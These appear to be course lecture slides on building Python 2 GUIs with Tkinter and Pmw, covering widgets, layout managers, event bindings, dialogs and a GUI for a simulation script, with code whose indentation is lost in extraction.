![]() | Tkinter has been the default Python GUI toolkit |
![]() | Most Python installations support Tkinter |
![]() | PyGtk, PyQt and wxPython are increasingly popular and more sophisticated toolkits |
![]() | These toolkits require huge C/C++ libraries (Gtk, Qt, wxWindows) to be installed on the user's machine |
![]() | Some prefer to generate GUIs using an interactive designer tool, which automatically generates calls to the GUI toolkit |
![]() | Some prefer to program the GUI code (or automate that process) |
![]() | It is very wise (and necessary) to learn some GUI programming even if you end up using a designer tool |
![]() | We treat Tkinter (with extensions) here since it is so widely available and simpler to use than its competitors |
![]() | See doc.html for links to literature on PyGtk, PyQt, wxPython and associated designer tools |

![]() | Ch. 6 in the course book |
![]() | ``Introduction to Tkinter'' by Lundh (see doc.html) |
![]() | Efficient working style: grab GUI code from examples |
![]() | Demo programs:
$PYTHONSRC/Demo/tkinter demos/All.py in the Pmw source tree $scripting/src/gui/demoGUI.py |

![]() | Tkinter is an interface to the Tk package in C (for Tcl/Tk) |
![]() | Megawidgets, built from basic Tkinter widgets, are available in Pmw (Python megawidgets) and Tix |
![]() | Pmw is written in Python |
![]() | Tix is written in C (and as Tk, aimed at Tcl users) |
![]() | GUI programming becomes simpler and more modular by using classes; Python supports this programming style |


![]() | Graphical user interface (GUI) for computing the sine of numbers | ||||||||
![]() | The complete window is made of widgets (also referred to as windows) | ||||||||
![]() | Widgets from left to right:
|


#!/usr/bin/env python
from Tkinter import *
import math
root = Tk() # root (main) window
top = Frame(root) # create frame (good habit)
top.pack(side='top') # pack frame in main window
hwtext = Label(top, text='Hello, World! The sine of')
hwtext.pack(side='left')
r = StringVar() # special variable to be attached to widgets
r.set('1.2') # default value
r_entry = Entry(top, width=6, relief='sunken', textvariable=r)
r_entry.pack(side='left')

s = StringVar() # variable to be attached to widgets
def comp_s():
global s
s.set('%g' % math.sin(float(r.get()))) # construct string
compute = Button(top, text=' equals ', command=comp_s)
compute.pack(side='left')
s_label = Label(top, textvariable=s, width=18)
s_label.pack(side='left')
root.mainloop()

![]() | A widget has a parent widget |
![]() | A widget must be packed (placed in the parent widget) before it can appear visually |
![]() | Typical structure:
widget = Tk_class(parent_widget,
arg1=value1, arg2=value2)
widget.pack(side='left')
|
![]() | Variables can be tied to the contents of, e.g., text entries, but only special Tkinter variables are legal: StringVar, DoubleVar, IntVar |

![]() | No widgets are visible before we call the event loop:
root.mainloop() |
![]() | This loop waits for user input (e.g. mouse clicks) |
![]() | There is no predefined program flow after the event loop is invoked; the program just responds to events |
![]() | The widgets define the event responses |


![]() | Instead of clicking "equals", pressing return in the entry window computes the sine value
# bind a Return in the .r entry to calling comp_s:
r_entry.bind('<Return>', comp_s)
|
![]() | One can bind any keyboard or mouse event to user-defined functions |
![]() | We have also replaced the "equals" button by a straight label |

![]() | The pack command determines the placement of the widgets:
widget.pack(side='left')This results in stacking widgets from left to right |


![]() | Packing from top to bottom:
widget.pack(side='top')results in
|
![]() | Values of side: left, right, top, bottom |


![]() | Frame: empty widget holding other widgets (used to group widgets) |
![]() | Make 3 frames, packed from top |
![]() | Each frame holds a row of widgets |
![]() | Middle frame: 4 widgets packed from left |

# create frame to hold the middle row of widgets:
rframe = Frame(top)
# this frame (row) is packed from top to bottom:
rframe.pack(side='top')
# create label and entry in the frame and pack from left:
r_label = Label(rframe, text='The sine of')
r_label.pack(side='left')
r = StringVar() # variable to be attached to widgets
r.set('1.2') # default value
r_entry = Entry(rframe, width=6, relief='sunken', textvariable=r)
r_entry.pack(side='left')


# platform-independent font name:
font = 'times 18 bold'
# or X11-style:
font = '-adobe-times-bold-r-normal-*-18-*-*-*-*-*-*-*'
hwtext = Label(hwframe, text='Hello, World!',
font=font)


padx and pady adds space around widgets:
hwtext.pack(side='top', pady=20) rframe.pack(side='top', padx=10, pady=20)


quit_button = Button(top,
text='Goodbye, GUI World!',
command=quit,
background='yellow',
foreground='blue')
quit_button.pack(side='top', pady=5, fill='x')
# fill='x' expands the widget throughout the available
# space in the horizontal direction


![]() | The anchor option can move widgets:
quit_button.pack(anchor='w') # or 'center', 'nw', 's' and so on # default: 'center' |
![]() | ipadx/ipady: more space inside the widget
quit_button.pack(side='top', pady=5,
ipadx=30, ipady=30, anchor='w')
|

$scripting/src/tools/packdemo.tcl


![]() | Alternative to pack: grid |
![]() | Widgets are organized in m times n cells, like a spreadsheet |
![]() | Widget placement:
widget.grid(row=1, column=5) |
![]() | A widget can span more than one cell
widget.grid(row=1, column=2, columnspan=4) |

![]() | Padding as with pack (padx, ipadx etc.) |
![]() | sticky replaces anchor and fill |


# use grid to place widgets in 3x4 cells:
hwtext.grid(row=0, column=0, columnspan=4, pady=20)
r_label.grid(row=1, column=0)
r_entry.grid(row=1, column=1)
compute.grid(row=1, column=2)
s_label.grid(row=1, column=3)
quit_button.grid(row=2, column=0, columnspan=4, pady=5,
sticky='ew')

![]() | sticky='w' means anchor='w' (move to west) |
![]() | sticky='ew' means fill='x' (move to east and west) |
![]() | sticky='news' means fill='both' (expand in all dirs) |

![]() | So far: variables tied to text entry and result label | ||||
![]() | Another method:
| ||||
![]() | Can use configure to update any widget property |


![]() | No variable is tied to the entry:
r_entry = Entry(rframe, width=6, relief='sunken')
r_entry.insert('end','1.2') # insert default value
r = float(r_entry.get())
s = math.sin(r)
s_label.configure(text=str(s))
|
![]() | Other properties can be configured:
s_label.configure(background='yellow') |

![]() | With the basic knowledge of GUI programming, you may try out a designer tool for interactive automatic generation of a GUI |
![]() | Glade: designer tool for PyGtk |
![]() | Gtk, PyGtk and Glade must be installed (not part of Python!) |
![]() | See doc.html for introductions to Glade |
![]() | Working style: pick a widget, place it in the GUI window, open a properties dialog, set packing parameters, set callbacks (signals in PyGtk), etc. |
![]() | Glade stores the GUI in an XML file |
![]() | The GUI is hence separate from the application code |

![]() | GUIs are conveniently implemented as classes |
![]() | Classes in Python are similar to classes in Java and C++ |
![]() | Constructor: create and pack all widgets |
![]() | Methods: called by buttons, events, etc. |
![]() | Attributes: hold widgets, widget variables, etc. |
![]() | The class instance can be used as an encapsulated GUI component in other GUIs (like a megawidget) |

![]() | Declare a base class MyBase:
class MyBase:
def __init__(self,i,j): # constructor
self.i = i; self.j = j
def write(self): # member function
print 'MyBase: i=',self.i,'j=',self.j
|
![]() | self is a reference to this object |
![]() | Data members are prefixed by self: self.i, self.j |
![]() | All functions take self as first argument in the
declaration, but not in the call
inst1 = MyBase(6,9); inst1.write() |

![]() | Class MySub is a subclass of MyBase:
class MySub(MyBase):
def __init__(self,i,j,k): # constructor
MyBase.__init__(self,i,j)
self.k = k;
def write(self):
print 'MySub: i=',self.i,'j=',self.j,'k=',self.k
|
![]() | Example:
# this function works with any object that has a write method: def write(v): v.write() # make a MySub instance inst2 = MySub(7,8,9) write(inst2) # will call MySub's write |

class HelloWorld:
def __init__(self, parent):
# store parent
# create widgets as in hwGUI9.py
def quit(self, event=None):
# call parent's quit, for use with binding to 'q'
# and quit button
def comp_s(self, event=None):
# sine computation
root = Tk()
hello = HelloWorld(root)
root.mainloop()

class HelloWorld:
def __init__(self, parent):
self.parent = parent # store the parent
top = Frame(parent) # create frame for all class widgets
top.pack(side='top') # pack frame in parent's window
# create frame to hold the first widget row:
hwframe = Frame(top)
# this frame (row) is packed from top to bottom:
hwframe.pack(side='top')
# create label in the frame:
font = 'times 18 bold'
hwtext = Label(hwframe, text='Hello, World!', font=font)
hwtext.pack(side='top', pady=20)

# create frame to hold the middle row of widgets:
rframe = Frame(top)
# this frame (row) is packed from top to bottom:
rframe.pack(side='top', padx=10, pady=20)
# create label and entry in the frame and pack from left:
r_label = Label(rframe, text='The sine of')
r_label.pack(side='left')
self.r = StringVar() # variable to be attached to r_entry
self.r.set('1.2') # default value
r_entry = Entry(rframe, width=6, textvariable=self.r)
r_entry.pack(side='left')
r_entry.bind('<Return>', self.comp_s)
compute = Button(rframe, text=' equals ',
command=self.comp_s, relief='flat')
compute.pack(side='left')

self.s = StringVar() # variable to be attached to s_label
s_label = Label(rframe, textvariable=self.s, width=12)
s_label.pack(side='left')
# finally, make a quit button:
quit_button = Button(top, text='Goodbye, GUI World!',
command=self.quit,
background='yellow', foreground='blue')
quit_button.pack(side='top', pady=5, fill='x')
self.parent.bind('<q>', self.quit)
def quit(self, event=None):
self.parent.quit()
def comp_s(self, event=None):
self.s.set('%g' % math.sin(float(self.r.get())))

![]() | Event bindings call functions that take an event object as argument:
self.parent.bind('<q>', self.quit)
def quit(self,event): # the event arg is required!
self.parent.quit()
|
![]() | Button must call a quit function without arguments:
def quit():
self.parent.quit()
quit_button = Button(frame, text='Goodbye, GUI World!',
command=quit)
|

![]() | Here is aunified quit function that can be used with buttons and event bindings:
def quit(self, event=None):
self.parent.quit()
|
![]() | Keyword arguments and None as default value make Python programming effective! |


Label + entry + label + entry + button + label
# f_widget, x_widget are text entry widgets f_txt = f_widget.get() # get function expression as string x = float(x_widget.get()) # get x as float ##### res = eval(f_txt) # turn f_txt expression into Python code ##### label.configure(text='%g' % res) # display f(x)

![]() | eval(s) evaluates a Python expression s
eval('sin(1.2) + 3.1**8')
|
![]() | exec(s) executes the string s as Python code
s = 'x = 3; y = sin(1.2*x) + x**8' exec(s) |
![]() | Main application: get Python expressions from a GUI (no need to parse mathematical expressions if they follow the Python syntax!), build tailored code at run-time depending on input to the script |

![]() | Recall simviz1.py: automating simulation and visualization of an oscillating system via a simple command-line interface |
![]() | GUI interface: |


class SimVizGUI:
def __init__(self, parent):
"""build the GUI"""
self.parent = parent
...
self.p = {} # holds all Tkinter variables
self.p['m'] = DoubleVar(); self.p['m'].set(1.0)
self.slider(slider_frame, self.p['m'], 0, 5, 'm')
self.p['b'] = DoubleVar(); self.p['b'].set(0.7)
self.slider(slider_frame, self.p['b'], 0, 2, 'b')
self.p['c'] = DoubleVar(); self.p['c'].set(5.0)
self.slider(slider_frame, self.p['c'], 0, 20, 'c')

def slider(self, parent, variable, low, high, label):
"""make a slider [low,high] tied to variable"""
widget = Scale(parent, orient='horizontal',
from_=low, to=high, # range of slider
# tickmarks on the slider "axis":
tickinterval=(high-low)/5.0,
# the steps of the counter above the slider:
resolution=(high-low)/100.0,
label=label, # label printed above the slider
length=300, # length of slider in pixels
variable=variable) # slider value is tied to variable
widget.pack(side='top')
return widget
def textentry(self, parent, variable, label):
"""make a textentry field tied to variable"""
...

![]() | Use three frames: left, middle, right |
![]() | Place sliders in the left frame |
![]() | Place text entry fields in the middle frame |
![]() | Place a sketch of the system in the right frame |

![]() | Version 1 of creating a text field: straightforward packing of labels and entries in frames:
def textentry(self, parent, variable, label):
"""make a textentry field tied to variable"""
f = Frame(parent)
f.pack(side='top', padx=2, pady=2)
l = Label(f, text=label)
l.pack(side='left')
widget = Entry(f, textvariable=variable, width=8)
widget.pack(side='left', anchor='w')
return widget
|



![]() | Use the grid geometry manager to place labels and text entry fields in a spreadsheet-like fashion:
def textentry(self, parent, variable, label):
"""make a textentry field tied to variable"""
l = Label(parent, text=label)
l.grid(column=0, row=self.row_counter, sticky='w')
widget = Entry(parent, textvariable=variable, width=8)
widget.grid(column=1, row=self.row_counter)
self.row_counter += 1
return widget
|
![]() | You can mix the use of grid and pack, but not within the same frame |

sketch_frame = Frame(self.parent)
sketch_frame.pack(side='left', padx=2, pady=2)
gifpic = os.path.join(os.environ['scripting'],
'src','gui','figs','simviz2.xfig.t.gif')
self.sketch = PhotoImage(file=gifpic)
# (images must be tied to a global or class variable!)
Label(sketch_frame,image=self.sketch).pack(side='top',pady=20)

![]() | Straight buttons calling a function |
![]() | Simulate: copy code from simviz1.py (create dir, create input file, run simulator) |
![]() | Visualize: copy code from simviz1.py (create file with Gnuplot commands, run Gnuplot) |

![]() | Example: display a file in a text widget
root = Tk()
top = Frame(root); top.pack(side='top')
text = Pmw.ScrolledText(top, ...
text.pack()
# insert file as a string in the text widget:
text.insert('end', open(filename,'r').read())
|
![]() | Problem: the text widget is not resized when the main window is resized |


![]() | Solution: combine the expand and fill options to pack:
text.pack(expand=1, fill='both') # all parent widgets as well: top.pack(side='top', expand=1, fill='both')expand allows the widget to expand, fill tells in which directions the widget is allowed to expand |
![]() | Try fileshow1.py and fileshow2.py! |
![]() | Resizing is important for text, canvas and list widgets |


Very useful demo program in All.py (comes with Pmw)

![]() | A Python script can act both as a library file (module) and an executable test example |
![]() | The test example is in a special end block
# demo program ("main" function) in case we run the script
# from the command line:
if __name__ == '__main__':
root = Tkinter.Tk()
Pmw.initialise(root)
root.title('preliminary test of ScrolledListBox')
# test:
widget = MyLibGUI(root)
root.mainloop()
|
![]() | Makes a built-in test for verification |
![]() | Serves as documentation of usage |




frame = Frame(top, borderwidth=5)
frame.pack(side='top')
header = Label(parent, text='Widgets for list data',
font='courier 14 bold', foreground='blue',
background='#%02x%02x%02x' % (196,196,196))
header.pack(side='top', pady=10, ipady=10, fill='x')
Button(parent, text='Display widgets for list data',
command=list_dialog, width=29).pack(pady=2)


# use a frame to align examples on various relief values:
frame = Frame(parent); frame.pack(side='top',pady=15)
# will use the grid geometry manager to pack widgets in this frame
reliefs = ('groove', 'raised', 'ridge', 'sunken', 'flat')
row = 0
for width in range(0,8,2):
label = Label(frame, text='reliefs with borderwidth=%d: ' % width)
label.grid(row=row, column=0, sticky='w', pady=5)
for i in range(len(reliefs)):
l = Label(frame, text=reliefs[i], relief=reliefs[i],
borderwidth=width)
l.grid(row=row, column=i+1, padx=5, pady=5)
row += 1


# predefined bitmaps:
bitmaps = ('error', 'gray25', 'gray50', 'hourglass',
'info', 'questhead', 'question', 'warning')
Label(parent, text="""\
Predefined bitmaps, which can be used to
label dialogs (questions, info etc.)""",
foreground='red').pack()
frame = Frame(parent); frame.pack(side='top', pady=5)
for i in range(len(bitmaps)): # write name of bitmaps
Label(frame, text=bitmaps[i]).grid(row=0, column=i+1)
for i in range(len(bitmaps)): # insert bitmaps
Label(frame, bitmap=bitmaps[i]).grid(row=1, column=i+1)

# basic Tk:
frame = Frame(parent); frame.pack()
Label(frame, text='case name').pack(side='left')
entry_var = StringVar(); entry_var.set('mycase')
e = Entry(frame, textvariable=entry_var, width=15,
command=somefunc)
e.pack(side='left')


case_widget = Pmw.EntryField(parent,
labelpos='w',
label_text='case name',
entry_width=15,
entry_textvariable=case,
command=status_entries)
# nice alignment of several Pmw.EntryField widgets:
widgets = (case_widget, mass_widget,
damping_widget, A_widget,
func_widget)
Pmw.alignlabels(widgets)

![]() | Pmw.EntryField can validate the input |
![]() | Example: real numbers larger than 0:
mass_widget = Pmw.EntryField(parent,
labelpos='w', # n, nw, ne, e and so on
label_text='mass',
validate={'validator': 'real', 'min': 0},
entry_width=15,
entry_textvariable=mass,
command=status_entries)
|
![]() | Writing letters or negative numbers does not work! |


# we use one Pmw.Balloon for all balloon helps:
balloon = Pmw.Balloon(top)
...
balloon.bind(A_widget,
'Pressing return updates the status line')
Point at the 'Amplitude' text entry and watch!

![]() | Seemingly similar to pulldown menu |
![]() | Used as alternative to radiobuttons or short lists |
func = StringVar(); func.set('y')
func_widget = Pmw.OptionMenu(parent,
labelpos='w', # n, nw, ne, e and so on
label_text='spring',
items=['y', 'y3', 'siny'],
menubutton_textvariable=func,
menubutton_width=6,
command=status_option)
def status_option(value):
# value is the current value in the option menu


y0 = DoubleVar(); y0.set(0.2)
y0_widget = Scale(parent,
orient='horizontal',
from_=0, to=2, # range of slider
tickinterval=0.5, # tickmarks on the slider "axis"
resolution=0.05, # counter resolution
label='initial value y(0)', # appears above
#font='helvetica 12 italic', # optional font
length=300, # length=300 pixels
variable=y0,
command=status_slider)


store_data = IntVar(); store_data.set(1)
store_data_widget = Checkbutton(parent,
text='store data',
variable=store_data,
command=status_checkbutton)
def status_checkbutton():
text = 'checkbutton : ' \
+ str(store_data.get())
...


menu_bar = Pmw.MenuBar(parent,
hull_relief='raised',
hull_borderwidth=1,
balloon=balloon,
hotkeys=1) # define accelerators
menu_bar.pack(fill='x')
# define File menu:
menu_bar.addmenu('File', None, tearoff=1)


menu_bar.addmenu('File', None, tearoff=1)
menu_bar.addmenuitem('File', 'command',
statusHelp='Open a file', label='Open...',
command=file_read)
...
menu_bar.addmenu('Dialogs',
'Demonstrate various Tk/Pmw dialog boxes')
...
menu_bar.addcascademenu('Dialogs', 'Color dialogs',
statusHelp='Exemplify different color dialogs')
menu_bar.addmenuitem('Color dialogs', 'command',
label='Tk Color Dialog',
command=tk_color_dialog)



![]() | List box (w/scrollbars); Pmw.ScrolledListBox | ||||
![]() | Combo box; Pmw.ComboBox | ||||
![]() | Option menu; Pmw.OptionMenu | ||||
![]() | Radio buttons; Radiobutton or Pmw.RadioSelect | ||||
![]() | Check buttons; Pmw.RadioSelect | ||||
![]() | Important:
|


list = Pmw.ScrolledListBox(frame,
listbox_selectmode = 'single', # 'multiple'
listbox_width = 12, listbox_height = 6,
label_text = 'plain listbox\nsingle selection',
labelpos = 'n', # label above list ('north')
selectioncommand = status_list1)

![]() | Call back function:
def status_list1():
"""extract single selections"""
selected_item = list1.getcurselection()[0]
selected_index = list1.curselection()[0]
|
![]() | Insert a list of strings (listitems):
for item in listitems:
list1.insert('end', item) # insert after end
|

![]() | Can select more than one item:
list2 = Pmw.ScrolledListBox(frame,
listbox_selectmode = 'multiple',
...
selectioncommand = status_list2)
...
def status_list2():
"""extract multiple selections"""
selected_items = list2.getcurselection() # tuple
selected_indices = list2.curselection() # tuple
|


radio_var = StringVar() # common variable
radio1 = Frame(frame_right)
radio1.pack(side='top', pady=5)
Label(radio1,
text='Tk radio buttons').pack(side='left')
for radio in ('radio1', 'radio2', 'radio3', 'radio4'):
r = Radiobutton(radio1, text=radio, variable=radio_var,
value='radiobutton no. ' + radio[5],
command=status_radio1)
r.pack(side='left')
...
def status_radio1():
text = 'radiobutton variable = ' + radio_var.get()
status_line.configure(text=text)


radio2 = Pmw.RadioSelect(frame_right,
selectmode='single',
buttontype='radiobutton',
labelpos='w',
label_text='Pmw radio buttons\nsingle selection',
orient='horizontal',
frame_relief='ridge', # try some decoration...
command=status_radio2)
for text in ('item1', 'item2', 'item3', 'item4'):
radio2.add(text)
radio2.invoke('item2') # 'item2' is pressed by default
def status_radio2(value):
...


radio3 = Pmw.RadioSelect(frame_right,
selectmode='multiple',
buttontype='checkbutton',
labelpos='w',
label_text='Pmw check buttons\nmultiple selection',
orient='horizontal',
frame_relief='ridge', # try some decoration...
command=status_radio3)
def status_radio3(value, pressed):
"""
Called when button value is pressed (pressed=1)
or released (pressed=0)
"""
... radio3.getcurselection() ...


combo1 = Pmw.ComboBox(frame,
label_text='simple combo box',
labelpos = 'nw',
scrolledlist_items = listitems,
selectioncommand = status_combobox,
listbox_height = 6,
dropdown = 0)
def status_combobox(value):
text = 'combo box value = ' + str(value)


import tkMessageBox
...
message = 'This is a demo of a Tk conformation dialog box'
ok = tkMessageBox.askokcancel('Quit', message)
if ok:
status_line.configure(text="'OK' was pressed")
else:
status_line.configure(text="'Cancel' was pressed")


message = 'This is a demo of a Tk message dialog box'
answer = tkMessageBox.Message(icon='info', type='ok',
message=message, title='About').show()
status_line.configure(text="'%s' was pressed" % answer)


message = """\
This is a demo of the Pmw.MessageDialog box,
which is useful for writing longer text messages
to the user."""
Pmw.MessageDialog(parent, title='Description',
buttons=('Quit',),
message_text=message,
message_justify='left',
message_font='helvetica 12',
icon_bitmap='info',
# must be present if icon_bitmap is:
iconpos='w')


userdef_d = Pmw.Dialog(self.parent,
title='Programmer-Defined Dialog',
buttons=('Apply', 'Cancel'),
#defaultbutton='Apply',
command=userdef_dialog_action)
frame = userdef_d.interior()
# stack widgets in frame as you want...
...
def userdef_dialog_action(result):
if result == 'Apply':
# extract dialog variables ...
else:
# you canceled the dialog
self.userdef_d.destroy() # destroy dialog window


import tkColorChooser
color = tkColorChooser.Chooser(
initialcolor='gray',
title='Choose background color').show()
# color[0]: (r,g,b) tuple, color[1]: hex number
parent_widget.tk_setPalette(color[1]) # change bg color



![]() | Make dialog for setting a color:
import pynche.pyColorChooser
color = pynche.pyColorChooser.askcolor(
color='gray', # initial color
master=parent_widget) # parent widget
# color[0]: (r,g,b) color[1]: hex number
# same as returned from tkColorChooser
|
![]() | Change the background color:
try:
parent_widget.tk_setPalette(color[1])
except:
pass
|


fname = tkFileDialog.Open(
filetypes=[('anyfile','*')]).show()


fname = tkFileDialog.SaveAs(
filetypes=[('temporary files','*.tmp')],
initialfile='myfile.tmp',
title='Save a file').show()

![]() |
Launch a new, separate toplevel window:
# read file, stored as a string filestr,
# into a text widget in a _separate_ window:
filewindow = Toplevel(parent) # new window
filetext = Pmw.ScrolledText(filewindow,
borderframe=5, # a bit space around the text
vscrollmode='dynamic', hscrollmode='dynamic',
labelpos='n',
label_text='Contents of file ' + fname,
text_width=80, text_height=20,
text_wrap='none')
filetext.pack()
filetext.insert('end', filestr)
|

![]() | Basic widgets are in Tk |
![]() | Pmw: megawidgets written in Python |
![]() | PmwContribD: extension of Pmw |
![]() | Tix: megawidgets in C that can be called from Python |
![]() | Looking for some advanced widget? check out Pmw, PmwContribD and Tix and their demo programs |

![]() | Canvas: highly interactive GUI element with
| ||||||
![]() | Text: flexible editing and displaying of text |



![]() | Very flexible, interactive widget for curve plotting |


![]() | Check out src/py/gui/animate.py |

See also ch. 11.1 in the course book

![]() | Check out src/tools/py4cs/DrawFunction.py |

See ch. 12.2.3 in the course book

![]() | Tree structures are used for, e.g., directory navigation |
![]() | Tix and PmwContribD contain some useful widgets: PmwContribD.TreeExplorer, PmwContribD.TreeNavigator, Tix.DirList, Tix.DirTree, Tix.ScrolledHList |

cd $SYSDIR/src/tcl/tix-8.1.3/demos # (version no may change) tixwish8.1.8.3 tixwidgets.tcl # run Tix demo


![]() | Can use Vtk (Visualization toolkit); Vtk has a Tk widget |
![]() | Vtk offers full 2D/3D visualization a la AVS, IRIS Explorer, OpenDX, but is fully programmable from C++, Python, Java or Tcl |
| MayaVi is a high-level interface to Vtk, written in Python (recommended!) | |
![]() | Tk canvas that allows OpenGL instructions |


![]() | Customizing fonts and colors |
![]() | Event bindings (mouse bindings in particular) |
![]() | Text widgets |

![]() | Ch. 11.2 in the course book |
![]() | ``Introduction to Tkinter'' by Lundh (see doc.html) |
![]() | ``Python/Tkinter Programming'' textbook by Grayson |
![]() | ``Python Programming'' textbook by Lutz |

![]() | Customizing fonts and colors in a specific widget is easy (see Hello World GUI examples) |
![]() | Sometimes fonts and colors of all Tk applications need to be controlled |
![]() | Tk has an option database for this purpose |
![]() | Can use file or statements for specifying an option Tk database |

![]() | File with syntax similar to X11 resources:
! set widget properties, first font and foreground of all widgets: *Font: Helvetica 19 roman *Foreground: blue ! then specific properties in specific widgets: *Label*Font: Times 10 bold italic *Listbox*Background: yellow *Listbox*Foregrund: red *Listbox*Font: Helvetica 13 italic |
![]() | Load the file:
root = Tk() root.option_readfile(filename) |

general_font = ('Helvetica', 19, 'roman')
label_font = ('Times', 10, 'bold italic')
listbox_font = ('Helvetica', 13, 'italic')
root.option_add('*Font', general_font)
root.option_add('*Foreground', 'black')
root.option_add('*Label*Font', label_font)
root.option_add('*Listbox*Font', listbox_font)
root.option_add('*Listbox*Background', 'yellow')
root.option_add('*Listbox*Foreground', 'red')
Play around with src/py/gui/options.py !


![]() | Move mouse over text: change background color, update counter |
![]() | Must bind events to text widget operations |

![]() | Mark parts of a text with tags:
self.hwtext = Text(parent, wrap='word')
# wrap='word' means break lines between words
self.hwtext.pack(side='top', pady=20)
self.hwtext.insert('end','Hello, World!\n', 'tag1')
self.hwtext.insert('end','More text...\n', 'tag2')
|
![]() | tag1 now refers to the 'Hello, World!' text |
![]() | Can detect if the mouse is over or clicked at a tagged text segment |

![]() | We want to call
self.hwtext.tag_configure('tag1', background='blue')
when the mouse is over the text marked with tag1
|
![]() | The statement
self.hwtext.tag_bind('tag1','<Enter>',
self.tag_configure('tag1', background='blue'))
does not work, because function calls with arguments are not allowed as parameters to a function (only the name of the function, i.e., the function object, is allowed)
|
![]() | Remedy: lambda functions (or our Command class) |

![]() | Lambda functions are some kind of 'inline' function definitions |
![]() | For example,
def somefunc(x, y, z):
return x + y + z
can be written as
lambda x, y, z: x + y + z |
![]() | General rule:
lambda arg1, arg2, ... : expression with arg1, arg2, ...is equivalent to
def (arg1, arg2, ...):
return expression with arg1, arg2, ...
|

![]() | Prefix words in a list with a double hyphen
['m', 'func', 'y0']should be transformed to ['--m', '--func', '--y0'] |
![]() | Basic programming solution:
def prefix(word):
return '--' + word
options = []
for i in range(len(variable_names)):
options.append(prefix(variable_names[i]))
|
![]() | Faster solution with map:
options = map(prefix, variable_names) |
![]() | Even more compact with lambda and map:
options = map(lambda word: '--' + word, variable_names) |

![]() | Lambda functions: insert a function call with your arguments as part of a command= argument |
![]() | Bind events when the mouse is over a tag:
# let tag1 be blue when the mouse is over the tag
# use lambda functions to implement the feature
self.hwtext.tag_bind('tag1','<Enter>',
lambda event=None, x=self.hwtext:
x.tag_configure('tag1', background='blue'))
self.hwtext.tag_bind('tag1','<Leave>',
lambda event=None, x=self.hwtext:
x.tag_configure('tag1', background='white'))
|
![]() | |
![]() | |

![]() | The lambda function applies keyword arguments
self.hwtext.tag_bind('tag1','<Enter>',
lambda event=None, x=self.hwtext:
x.tag_configure('tag1', background='blue'))
|
![]() | Why? |
![]() | The function is called as some anonymous function
def func(event=None):and we want the body to call self.hwtext, but self does not have the right class instance meaning in this function |
![]() | Remedy: keyword argument x holding the right reference to the function we want to call |

![]() | Make a more readable alternative to lambda:
class Command:
def __init__(self, func, *args, **kw):
self.func = func
self.args = args # ordinary arguments
self.kw = kw # keyword arguments (dictionary)
def __call__(self, *args, **kw):
args = args + self.args
kw.update(self.kw) # override kw with orig self.kw
self.func(*args, **kw)
|
![]() | Example:
def f(a, b, max=1.2, min=2.2): # some function
print 'a=%g, b=%g, max=%g, min=%g' % (a,b,max,min)
c = Command(f, 2.3, 2.1, max=0, min=-1.2)
c() # call f(2.3, 2.1, 0, -1.2)
|

from py4cs.misc import Command
self.hwtext.tag_bind('tag1','<Enter>',
Command(self.configure, 'tag1', 'blue'))
def configure(self, event, tag, bg):
self.hwtext.tag_configure(tag, background=bg)
###### compare this with the lambda version:
self.hwtext.tag_bind('tag1','<Enter>',
lambda event=None, x=self.hwtext:
x.tag_configure('tag1',background='blue')

![]() | Construct Python code in a string:
def genfunc(self, tag, bg, optional_code=''):
funcname = 'temp'
code = "def %(funcname)s(self, event=None):\n"\
" self.hwtext.tag_configure("\
"'%(tag)s', background='%(bg)s')\n"\
" %(optional_code)s\n" % vars()
|
![]() | Execute this code (i.e. define the function!)
exec code in vars()
|
![]() | Return the defined function object:
# funcname is a string,
# eval() turns it into func obj:
return eval(funcname)
|

![]() | Example on calling code:
self.tag2_leave = self.genfunc('tag2', 'white')
self.hwtext.tag_bind('tag2', '<Leave>', self.tag2_leave)
self.tag2_enter = self.genfunc('tag2', 'red',
# add a string containing optional Python code:
r"i=...self.hwtext.insert(i,'You have hit me "\
"%d times' % ...")
self.hwtext.tag_bind('tag2', '<Enter>', self.tag2_enter)
|
![]() | Flexible alternative to lambda functions! |

![]() | Usage:
root = Tkinter.Tk()
Pmw.initialise(root)
root.title('GUI for Script II')
list = [('exercise 1', 'easy stuff'),
('exercise 2', 'not so easy'),
('exercise 3', 'difficult')
]
widget = Fancylist(root,list)
root.mainloop()
|
![]() | When the mouse is over a list item, the background color changes and the help text appears in a label below the list |

import Tkinter, Pmw
class Fancylist:
def __init__(self, parent, list,
list_width=20, list_height=10):
self.frame = Tkinter.Frame(parent, borderwidth=3)
self.frame.pack()
self.listbox = Pmw.ScrolledText(self.frame,
vscrollmode='dynamic', hscrollmode='dynamic',
labelpos='n',
label_text='list of chosen curves',
text_width=list_width, text_height=list_height,
text_wrap='none', # do not break too long lines
)
self.listbox.pack(pady=10)
self.helplabel = Tkinter.Label(self.frame, width=60)
self.helplabel.pack(side='bottom',fill='x',expand=1)

# Run through the list, define a tag,
# bind a lambda function to the tag:
counter = 0
for (item, help) in list:
tag = 'tag' + str(counter) # unique tag name
self.listbox.insert('end', item + '\n', tag)
self.listbox.tag_bind(tag, '<Enter>',
lambda event, f=self.configure, t=tag,
bg='blue', text=help:
f(event, t, bg, text))
self.listbox.tag_bind(tag, '<Leave>',
lambda event, f=self.configure, t=tag,
bg='white', text='':
f(event, t, bg, text))
counter = counter + 1
# make the text buffer read-only:
self.listbox.configure(text_state='disabled')
def configure(self, event, tag, bg, text):
self.listbox.tag_configure(tag, background=bg)
self.helplabel.configure(text=text)

![]() | Recall the simviz1.py script for running a simulation program and visualizing the results |
![]() | simviz1.py was a straight script, even without functions |
![]() | As an example, let's make a class implementation
class SimViz:
def __init__(self):
self.default_values()
def initialize(self):
...
def process_command_line_args(self, cmlargs):
...
def simulate(self):
...
def visualize(self):
...
|

![]() | simviz1.py had problem-dependent variables like m, b, func, etc. |
![]() | In a complicated application, there can be a large amount of such parameters so let's automate |
![]() | Store all parameters in a dictionary:
self.p['m'] = 1.0 self.p['func'] = 'y'etc. |
![]() | The initialize function sets default values to all parameters in self.p |

def process_command_line_args(self, cmlargs):
"""Load data from the command line into self.p."""
opt_spec = [ x+'=' for x in self.p.keys() ]
try:
options, args = getopt.getopt(cmlargs,'',opt_spec)
except getopt.GetoptError:
<handle illegal options>
for opt, val in options:
key = opt[2:] # drop prefix --
if isinstance(self.p[key], float): val = float(val)
elif isinstance(self.p[key], int): val = int(val)
self.p[key] = val

![]() | These are straight translations from code segments in simviz1.py |
![]() | Remember: m is replaced by self.p['m'], func by self.p['func'] and so on |
![]() | Variable interpolation,
s = 'm=%(m)g ...' % vars()does not work with s = 'm=%(self.p['m'])g ...' % vars()so we must use a standard printf construction: s = 'm=%g ...' % (m, ...)or (better) s = 'm=%(m)g ...' % self.p |

